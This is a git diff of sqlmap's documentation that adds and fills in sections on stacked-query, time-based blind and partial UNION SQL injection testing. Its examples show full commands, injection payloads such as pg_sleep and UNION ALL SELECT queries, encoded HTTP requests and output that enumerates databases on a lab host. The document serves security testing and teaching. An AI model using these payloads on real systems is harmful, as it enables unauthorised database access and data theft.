sqlmapproject
diff --git a/‎doc/ChangeLog‎
Lines changed: 3 additions & 3 deletions b/‎doc/ChangeLog‎
Lines changed: 3 additions & 3 deletions
diff --git a/‎doc/README.html‎
Lines changed: 189 additions & 31 deletions b/‎doc/README.html‎
Lines changed: 189 additions & 31 deletions
diff --git a/‎doc/README.pdf‎
5.11 KB b/‎doc/README.pdf‎
5.11 KB
@@ -6,9 +6,9 @@ sqlmap (0.6.3-1) stable; urgency=low
     'conversations/' folder path by providing option -l <filepath>;
   * Major enhancement to support Partial UNION query SQL injection
     technique too;
-  * Major enhancement to support stacked queries (multiple staatements)
-    when the web application supports them which is useful for time based
-    blind sql injection test and will be used someday also by takeover
+  * Major enhancement to test if the web application technology supports
+    stacked queries (multiple statements) by providing option
+    --stacked-test which will be then used someday also by takeover
     functionality;
   * Major enhancement to test if the injectable parameter is affected by
     a time based blind SQL injection technique by providing option
 
@@ -446,6 +446,7 @@ <H2><A NAME="s5">5.</A> <A HREF="#toc5">Usage</A></H2>
     or to use one of them to exploit the affected parameter(s) rather than
     using the default blind SQL injection technique.
 
+    --stacked-test      Test for stacked queries (multiple statements) support
     --time-test         Test for Time based blind SQL injection
     --union-test        Test for UNION query (inband) SQL injection
     --union-use         Use the UNION query (inband) SQL injection to retrieve
@@ -1801,11 +1802,104 @@ <H3>Exclude specific page content</H3>
 <H2><A NAME="ss5.4">5.4</A> <A HREF="#toc5.4">Techniques</A>
 </H2>
 
+<H3>Test for stacked queries (multiple statements) support</H3>
+
+<P>Option: <CODE>--stacked-test</CODE></P>
+
+<P>It is possible to test if the web application technology supports
+<B>stacked queries</B>, multiple statements, on the injectable
+parameter.</P>
+
+<P>Example on a <B>MySQL 5.0.67</B> target:</P>
+<P>
+<BLOCKQUOTE><CODE>
+<PRE>
+$ python sqlmap.py -u "http://192.168.1.121/sqlmap/mysql/get_int.php?id=1" \
+  --stacked-test -v 1
+
+[...]
+back-end DBMS: MySQL >= 5.0.0
+
+[hh:mm:15] [INFO] testing stacked queries support on parameter 'id'
+[hh:mm:15] [WARNING] the web application does not support stacked queries on parameter 'id'
+stacked queries support:        None
+</PRE>
+</CODE></BLOCKQUOTE>
+</P>
+
+<P>By default PHP builtin function <CODE>mysql_query()</CODE> does not support
+multiple statements.
+Multiple statements is a feature supported by default only by some
+web application technologies in relation to the back-end database
+management system. For instance, as you can see from the next example,
+where PHP does not support them on MySQL, it does on PostgreSQL.</P>
+
+<P>Example on a <B>PostgreSQL 8.3.5</B> target:</P>
+<P>
+<BLOCKQUOTE><CODE>
+<PRE>
+$ python sqlmap.py -u "http://192.168.1.121/sqlmap/pgsql/get_int.php?id=1" \
+  --stacked-test -v 1
+
+[...]
+back-end DBMS: PostgreSQL
+
+[hh:mm:01] [INFO] testing stacked queries support on parameter 'id'
+[hh:mm:06] [INFO] the web application supports stacked queries on parameter 'id'
+stacked queries support:    'id=1; SELECT pg_sleep(5);-- AND 3128=3128'
+</PRE>
+</CODE></BLOCKQUOTE>
+</P>
+
+
 <H3>Test for Time based blind SQL injection</H3>
 
 <P>Option: <CODE>--time-test</CODE></P>
 
-<P>TODO</P>
+<P>It is possible to test if the target URL is affected by a <B>Time based
+blind SQL injection</B> vulnerability.</P>
+
+<P>Example on a <B>MySQL 5.0.67</B> target:</P>
+<P>
+<BLOCKQUOTE><CODE>
+<PRE>
+$ python sqlmap.py -u "http://192.168.1.121/sqlmap/mysql/get_int.php?id=1" \
+  --time-test -v 1
+
+[...]
+back-end DBMS: MySQL >= 5.0.0
+
+[hh:mm:05] [INFO] testing time based blind sql injection on parameter 'id' with AND 
+condition syntax
+[hh:mm:10] [INFO] the parameter 'id' is affected by a time based blind sql injection 
+with AND condition syntax
+time based blind sql injection payload:    'id=1 AND SLEEP(5) AND 5249=5249'
+</PRE>
+</CODE></BLOCKQUOTE>
+</P>
+
+<P>Example on a <B>PostgreSQL 8.3.5</B> target:</P>
+<P>
+<BLOCKQUOTE><CODE>
+<PRE>
+$ python sqlmap.py -u "http://192.168.1.121/sqlmap/pgsql/get_int.php?id=1" \
+  --time-test -v 1
+
+[...]
+back-end DBMS: PostgreSQL
+
+[hh:mm:30] [INFO] testing time based blind sql injection on parameter 'id' with AND 
+condition syntax
+[hh:mm:30] [WARNING] the parameter 'id' is not affected by a time based blind sql 
+injection with AND condition syntax
+[hh:mm:30] [INFO] testing time based blind sql injection on parameter 'id' with stacked 
+query syntax
+[hh:mm:35] [INFO] the parameter 'id' is affected by a time based blind sql injection 
+with stacked query syntax
+time based blind sql injection payload:    'id=1; SELECT pg_sleep(5);-- AND 9644=9644'
+</PRE>
+</CODE></BLOCKQUOTE>
+</P>
 
 
 <H3>Test for UNION query SQL injection</H3>
@@ -1873,7 +1967,10 @@ <H3>Use the UNION query SQL injection</H3>
 exploiting.
 If the confirmation fails, it will check if the parameter is affected by
 a <B>Partial UNION query SQL injection</B>, then use it to go ahead if it
-is vulnerable.</P>
+is vulnerable.
+In case the inband SQL injection vulnerability is not exploitable, sqlmap
+will automatically fallback on the blind SQL injection technique to go
+ahead.</P>
 
 <P>Example on a <B>Microsoft SQL Server 2000 Service Pack 0</B> target:</P>
 <P>
@@ -1915,18 +2012,19 @@ <H3>Use the UNION query SQL injection</H3>
 <BLOCKQUOTE><CODE>
 <PRE>
 $ python sqlmap.py -u "http://192.168.1.121/sqlmap/mysql/get_int.php?id=1" -v 5 \
-  --union-use --banner
+  --union-use --current-user
 
 [...]
-[hh:mm:25] [INFO] the target url is affected by an exploitable full inband sql injection 
-vulnerability
-[hh:mm:25] [INFO] query:  UNION ALL SELECT NULL, CONCAT(CHAR(98,108,76,79,106,78),
-VERSION(),CHAR(122,110,105,89,121,65)), NULL# AND 6043=6043
-[hh:mm:25] [TRAFFIC OUT] HTTP request:
-GET /sqlmap/mysql/get_int.php?id=1%20UNION%20ALL%20SELECT%20NULL%2C%20CONCAT%28CHAR%2898
-%2C108%2C76%2C79%2C106%2C78%29%2CIFNULL%28CAST%28VERSION%28%29%20AS%20CHAR%2810000%29%29
-%2C%20CHAR%2832%29%29%2CCHAR%28122%2C110%2C105%2C89%2C121%2C65%29%29%2C%20NULL%23%20AND%2
-06043=6043 HTTP/1.1
+[hh:mm:29] [INFO] the target url is affected by an exploitable full inband sql 
+injection vulnerability
+[hh:mm:29] [INFO] query:  UNION ALL SELECT NULL, CONCAT(CHAR(112,110,121,77,88,86),
+IFNULL(CAST(CURRENT_USER() AS CHAR(10000)), CHAR(32)),CHAR(72,89,75,77,121,103)), 
+NULL# AND 8032=8032
+[hh:mm:29] [TRAFFIC OUT] HTTP request:
+GET /sqlmap/mysql/get_int.php?id=1%20UNION%20ALL%20SELECT%20NULL%2C%20CONCAT%28CHAR%28112
+%2C110%2C121%2C77%2C88%2C86%29%2CIFNULL%28CAST%28CURRENT_USER%28%29%20AS%20CHAR%2810000%29
+%29%2C%20CHAR%2832%29%29%2CCHAR%2872%2C89%2C75%2C77%2C121%2C103%29%29%2C%20NULL%23%20AND
+%208032=8032 HTTP/1.1
 Accept-charset: ISO-8859-15,utf-8;q=0.7,*;q=0.7
 Host: 192.168.1.121:80
 Accept-language: en-us,en;q=0.5
@@ -1935,11 +2033,11 @@ <H3>Use the UNION query SQL injection</H3>
 User-agent: sqlmap/0.6.3 (http://sqlmap.sourceforge.net)
 Connection: close
 
-[hh:mm:25] [TRAFFIC IN] HTTP response (OK - 200):
-Date: Mon, 28 Jul 2008 22:34:25 GMT
-Server: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.2 with Suhosin-Patch mod_ssl/2.2.8 
-OpenSSL/0.9.8g mod_perl/2.0.3 Perl/v5.8.8
-X-Powered-By: PHP/5.2.4-2ubuntu5.2
+[hh:mm:29] [TRAFFIC IN] HTTP response (OK - 200):
+Date: Tue, 16 Dec 2008 hh:mm:29 GMT
+Server: Apache/2.2.9 (Ubuntu) PHP/5.2.6-2ubuntu4 with Suhosin-Patch mod_ssl/2.2.9 
+OpenSSL/0.9.8g mod_perl/2.0.4 Perl/v5.10.0
+X-Powered-By: PHP/5.2.6-2ubuntu4
 Content-Length: 194
 Connection: close
 Content-Type: text/html
@@ -1948,21 +2046,81 @@ <H3>Use the UNION query SQL injection</H3>
 &lt;b&gt;SQL results:&lt;/b&gt;
 &lt;table border="1"&gt;
 &lt;tr&gt;&lt;td&gt;1&lt;/td&gt;&lt;td&gt;luther&lt;/td&gt;&lt;td&gt;blissett&lt;/td&gt;&lt;/tr&gt;
-&lt;tr&gt;&lt;td&gt;&lt;/td&gt;&lt;td&gt;FPMIFA5.0.67-0ubuntu6zFQAiQ&lt;/td&gt;&lt;td&gt;&lt;/td&gt;&lt;/tr&gt;
+&lt;tr&gt;&lt;td&gt;&lt;/td&gt;&lt;td&gt;pnyMXVtestuser@localhostHYKMyg&lt;/td&gt;&lt;td&gt;&lt;/td&gt;&lt;/tr&gt;
 &lt;/table&gt;
 &lt;/body&gt;&lt;/html&gt;
 
-[hh:mm:25] [INFO] performed 3 queries in 0 seconds
-banner:    '5.0.67-0ubuntu6'
+[hh:mm:29] [INFO] performed 3 queries in 0 seconds
+current user:    'testuser@localhost'
 </PRE>
 </CODE></BLOCKQUOTE>
 </P>
 
-<P>As you can see, the MySQL <CODE>version()</CODE> function (banner) output is
-nested (inband) within the HTTP response page, this makes the inband SQL
-injection exploitable.</P>
+<P>As you can see, the MySQL <CODE>CURRENT_USER()</CODE> function (--current-user)
+output is nested, inband, within the HTTP response page, this makes the
+inband SQL injection exploited.</P>
+
+<P>In case the inband SQL injection is not fully exploitable, sqlmap will
+check if it is partially exploitable: this occurs if the query output
+is not parsed within a <CODE>for</CODE>, or similar, cycle but only the first
+entry is displayed in the page content.</P>
+
+<P>Example on a <B>MySQL 5.0.67</B> target:</P>
+<P>
+<BLOCKQUOTE><CODE>
+<PRE>
+$ python sqlmap.py -u "http://192.168.1.121/sqlmap/mysql/get_int_partialunion.php?id=1" -v 1 \
+  --union-use --dbs
+
+[...]
+back-end DBMS: MySQL >= 5.0.0
+
+[hh:mm:56] [INFO] fetching database names
+[hh:mm:56] [INFO] testing inband sql injection on parameter 'id'
+[hh:mm:56] [INFO] the target url could be affected by an inband sql injection vulnerability
+[hh:mm:56] [INFO] confirming full inband sql injection on parameter 'id'
+[hh:mm:56] [WARNING] the target url is not affected by an exploitable full inband sql 
+injection vulnerability
+[hh:mm:56] [INFO] confirming partial inband sql injection on parameter 'id'
+[hh:mm:56] [INFO] the target url is affected by an exploitable partial inband sql injection 
+vulnerability
+[hh:mm:56] [INFO] query:  UNION ALL SELECT NULL, CONCAT(CHAR(90,121,78,99,122,76),
+IFNULL(CAST(COUNT(schema_name) AS CHAR(10000)), CHAR(32)),CHAR(110,97,105,116,84,120)), NULL 
+FROM information_schema.SCHEMATA# AND 1062=1062
+[hh:mm:56] [INFO] performed 6 queries in 0 seconds
+[hh:mm:56] [INFO] the SQL query provided returns 4 entries
+[hh:mm:56] [INFO] query:  UNION ALL SELECT NULL, CONCAT(CHAR(90,121,78,99,122,76),IFNULL(
+CAST(schema_name AS CHAR(10000)), CHAR(32)),CHAR(110,97,105,116,84,120)), NULL FROM 
+information_schema.SCHEMATA LIMIT 0, 1# AND 1421=1421
+[hh:mm:56] [INFO] performed 7 queries in 0 seconds
+[hh:mm:56] [INFO] query:  UNION ALL SELECT NULL, CONCAT(CHAR(90,121,78,99,122,76),IFNULL(
+CAST(schema_name AS CHAR(10000)), CHAR(32)),CHAR(110,97,105,116,84,120)), NULL FROM 
+information_schema.SCHEMATA LIMIT 1, 1# AND 9553=9553
+[hh:mm:56] [INFO] performed 8 queries in 0 seconds
+[hh:mm:56] [INFO] query:  UNION ALL SELECT NULL, CONCAT(CHAR(90,121,78,99,122,76),IFNULL(
+CAST(schema_name AS CHAR(10000)), CHAR(32)),CHAR(110,97,105,116,84,120)), NULL FROM 
+information_schema.SCHEMATA LIMIT 2, 1# AND 6805=6805
+[hh:mm:56] [INFO] performed 9 queries in 0 seconds
+[hh:mm:56] [INFO] query:  UNION ALL SELECT NULL, CONCAT(CHAR(90,121,78,99,122,76),IFNULL(
+CAST(schema_name AS CHAR(10000)), CHAR(32)),CHAR(110,97,105,116,84,120)), NULL FROM 
+information_schema.SCHEMATA LIMIT 3, 1# AND 739=739
+[hh:mm:56] [INFO] performed 10 queries in 0 seconds
+available databases [4]:
+[*] information_schema
+[*] mysql
+[*] privatedb
+[*] test
+</PRE>
+</CODE></BLOCKQUOTE>
+</P>
 
-<P>TODO: details on partial ...</P>
+<P>As you can see, sqlmap identified that the parameter is affected by a
+partial inband SQL injection, consequently counted the number of query
+output entries and retrieved once per time by forcing the parameter
+(<CODE>id</CODE>) value <CODE>1</CODE> to its negative value <CODE>-1</CODE> so that
+it does not returns, presumibly, any output leaving our own <CODE>UNION ALL
+SELECT</CODE> statement to produce one entry at a time and display it in the
+page content.</P>
 
 
 <H2><A NAME="ss5.5">5.5</A> <A HREF="#toc5.5">Fingerprint</A>
@@ -2742,14 +2900,14 @@ <H3>Database table columns</H3>
 [...]
 back-end DBMS: MySQL >= 5.0.0
 
-[15:54:25] [WARNING] missing database parameter, sqlmap is going to use the current 
+[hh:mm:25] [WARNING] missing database parameter, sqlmap is going to use the current 
 database to enumerate table 'users' columns
-[15:54:25] [INFO] fetching current database
-[15:54:25] [INFO] query: IFNULL(CAST(DATABASE() AS CHAR(10000)), CHAR(32))
-[15:54:25] [INFO] retrieved: test
-[15:54:25] [INFO] performed 34 queries in 0 seconds
-[15:54:25] [INFO] fetching columns for table 'users' on database 'test'
-[15:54:25] [INFO] fetching number of columns for table 'users' on database 'test'
+[hh:mm:25] [INFO] fetching current database
+[hh:mm:25] [INFO] query: IFNULL(CAST(DATABASE() AS CHAR(10000)), CHAR(32))
+[hh:mm:25] [INFO] retrieved: test
+[hh:mm:25] [INFO] performed 34 queries in 0 seconds
+[hh:mm:25] [INFO] fetching columns for table 'users' on database 'test'
+[hh:mm:25] [INFO] fetching number of columns for table 'users' on database 'test'
 [...]
 Database: test
 Table: users